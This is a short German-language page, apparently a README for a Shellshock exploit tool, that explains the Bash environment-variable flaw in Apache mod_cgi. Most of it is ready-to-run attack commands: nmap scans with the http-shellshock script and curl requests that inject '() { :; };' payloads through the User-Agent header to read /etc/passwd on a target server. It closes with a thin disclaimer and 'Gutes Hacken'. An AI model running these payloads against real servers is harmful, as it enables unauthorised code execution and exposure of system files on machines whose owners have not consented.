
Ausnutzung der "Shellshock"-Sicherheitslücke. Remote Code Execution in Apache mit mod_cgi
Shellshock ist im Wesentlichen eine Remote-Command-Execution-Schwachstelle in BASH. Dieses Skript nutzt die Schwachstelle in der Web-Umgebung auf Apache oder ähnlichen Servern mit aktiviertem mod_cgi. Die Schwachstelle liegt in der Manipulation von Umgebungsvariablen, bei denen es sich um dynamische, benannte Werte handelt, die beeinflussen, wie Prozesse auf einem Computer ablaufen. Angreifer können dies ausnutzen, indem sie schädlichen Code an Umgebungsvariablen anhängen, der beim Empfang der Variable ausgeführt wird. Dadurch können Angreifer das System möglicherweise kompromittieren.
$ nmap 192.168.x.x --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
$ nmap -sV -p- --script http-shellshock 192.168.x.x
$ nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls 192.168.x.x
sudo curl -H "User-Agent: () { :; }; /bin/cat /etc/passwd" <WEBSERVER-IP>
sudo curl -A "() { :;}; echo Content-Type: text/html; echo; /bin/cat /etc/passwd;" <WEBSERVER-IP>
Ich bin nicht verantwortlich für illegale Nutzung oder Schäden, die durch dieses Tool verursacht werden. Es wurde zum Spaß geschrieben, nicht für böse Zwecke, und soll das Bewusstsein für Hacking und Cybersicherheit schärfen.
*Gutes Hacken :) *